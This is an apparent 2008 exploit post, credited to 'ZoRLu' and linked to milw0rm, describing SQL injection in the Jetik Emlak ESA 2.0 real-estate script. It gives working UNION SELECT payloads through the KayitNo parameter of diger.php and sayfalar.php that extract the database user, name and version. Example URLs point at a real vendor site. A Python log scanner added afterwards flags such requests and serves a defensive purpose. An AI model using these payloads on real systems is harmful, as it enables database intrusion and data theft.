"The Devil Is the Voice Within; Lend an Ear to That Voice"

-Zorlu BUĞRAHAN-

Thursday, 25 September 2008

Jetik Emlak ESA 2.0 System Script Multiple Remote SQL Injection

link: http://www.milw0rm.com/exploits/6549

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/diger.php?KayitNo=[SQL]

http://localhost/script_path/sayfalar.php?KayitNo=[SQL]

[SQL]=

-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example:

http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example 2:

http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
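
A defender-side check for the requests shown above, added here as an example and not part of the original advisory: it scans web-server access log lines for requests to diger.php or sayfalar.php whose KayitNo is not a plain integer. The combined log format, the sample lines and the assumption that a legitimate KayitNo is a decimal record number are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameter named in the advisory.
AFFECTED_SCRIPTS = {"diger.php", "sayfalar.php"}
PARAM = "KayitNo"

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate KayitNo is a plain decimal record number.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")


def bad_kayitno(log_line):
    """Return the decoded KayitNo value if it is not a plain integer, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if target.path.rsplit("/", 1)[-1] not in AFFECTED_SCRIPTS:
        return None
    # parse_qs decodes '+' and %xx, so encoded values are normalised first.
    for value in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
        if not VALID_ID_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = bad_kayitno(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample log (documentation IPs, placeholder path from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2008:10:00:01 +0300] "GET /script_path/diger.php?KayitNo=12 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [25/Sep/2008:10:00:09 +0300] "GET /script_path/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/* HTTP/1.1" 200 4312',
    '192.0.2.10 - - [25/Sep/2008:10:00:15 +0300] "GET /script_path/sayfalar.php?KayitNo=3 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [25/Sep/2008:10:00:20 +0300] "GET /script_path/index.php?KayitNo=abc HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious {PARAM}={value!r}")
```

The same integer-only test, applied inside the two scripts before KayitNo reaches the query, rejects the request instead of only logging it.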
